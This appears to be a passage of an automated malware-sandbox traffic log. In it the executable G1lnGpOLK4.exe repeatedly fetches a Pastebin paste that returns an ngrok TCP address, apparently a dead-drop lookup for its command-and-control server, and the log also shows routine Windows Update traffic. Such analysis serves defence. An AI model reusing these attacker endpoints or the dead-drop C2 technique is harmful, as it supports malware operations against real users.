                                                                    2024-05-02 04:01:48 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.449768104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:53 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:53 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:53 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 46
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51cd61eee41c1-EWR
                                                                    2024-05-02 04:01:53 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.44976740.68.123.157443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:53 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                    Host: slscr.update.microsoft.com
                                                                    2024-05-02 04:01:54 UTC560INHTTP/1.1 200 OK
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    Content-Type: application/octet-stream
                                                                    Expires: -1
                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                    ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                    MS-CorrelationId: 73bf6ee7-ab25-4608-ba53-36e080279018
                                                                    MS-RequestId: eeacbd15-c828-4aa1-a23d-e8c46a0d0cd5
                                                                    MS-CV: g05sRMwMH0a6XnE5.0
                                                                    X-Microsoft-SLSClientCache: 2160
                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                    X-Content-Type-Options: nosniff
                                                                    Date: Thu, 02 May 2024 04:01:53 GMT
                                                                    Connection: close
                                                                    Content-Length: 25457
                                                                    2024-05-02 04:01:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                    Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                    2024-05-02 04:01:54 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                    Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.449770104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:59 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:01:59 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:01:59 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 52
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51cfba848727a-EWR
                                                                    2024-05-02 04:01:59 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:01:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.449774104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:04 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:04 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:04 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 57
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51d1cea480f80-EWR
                                                                    2024-05-02 04:02:04 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.449776104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:11 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:11 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:11 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 64
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51d461d510f37-EWR
                                                                    2024-05-02 04:02:11 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.449778104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:16 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:16 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:16 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 69
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51d67bc4343ff-EWR
                                                                    2024-05-02 04:02:16 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.449780104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:22 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:02:22 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:22 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 75
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51d88dca7429e-EWR
                                                                    2024-05-02 04:02:22 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.449782104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:27 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:27 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:27 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 80
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51da9d8cb80e2-EWR
                                                                    2024-05-02 04:02:27 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.449785104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:32 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:02:32 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:32 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 85
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51dcaf9d21869-EWR
                                                                    2024-05-02 04:02:32 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.449787104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:38 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:38 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:38 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 91
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51deebd554396-EWR
                                                                    2024-05-02 04:02:38 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.449789104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:43 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:43 UTC396INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:43 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 96
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51e102e25729e-EWR
                                                                    2024-05-02 04:02:43 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.449791104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:49 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:49 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:49 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 102
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51e320d7d0f3f-EWR
                                                                    2024-05-02 04:02:49 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.449793104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:54 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:54 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:54 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 107
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51e5378a642bd-EWR
                                                                    2024-05-02 04:02:54 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    29192.168.2.449795104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:02:59 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:02:59 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:02:59 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 112
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51e7439d38c69-EWR
                                                                    2024-05-02 04:02:59 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:02:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    30192.168.2.449797104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:04 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:04 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:04 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 117
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51e92694ac466-EWR
                                                                    2024-05-02 04:03:04 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.449799104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:09 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:09 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:09 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 122
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51eb2ccafc32a-EWR
                                                                    2024-05-02 04:03:09 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.449801104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:14 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:03:15 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:15 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 128
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51ed34a7317b1-EWR
                                                                    2024-05-02 04:03:15 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.449803104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:19 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:19 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:19 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 132
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51ef06837438d-EWR
                                                                    2024-05-02 04:03:19 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.449805104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:24 UTC50OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    2024-05-02 04:03:24 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:24 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 137
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51f0c3d454216-EWR
                                                                    2024-05-02 04:03:24 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
                                                                    2024-05-02 04:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.449807104.20.3.2354432472C:\Users\user\Desktop\G1lnGpOLK4.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:03:28 UTC74OUTGET /raw/s4TipmJt HTTP/1.1
                                                                    Host: pastebin.com
                                                                    Connection: Keep-Alive
                                                                    2024-05-02 04:03:28 UTC397INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:03:28 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    x-frame-options: DENY
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1;mode=block
                                                                    cache-control: public, max-age=1801
                                                                    CF-Cache-Status: HIT
                                                                    Age: 141
                                                                    Last-Modified: Thu, 02 May 2024 04:01:07 GMT
                                                                    Server: cloudflare
                                                                    CF-RAY: 87d51f298bfb8c06-EWR
                                                                    2024-05-02 04:03:28 UTC29INData Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a
                                                                    Data Ascii: 170.tcp.eu.ngrok.io:15155
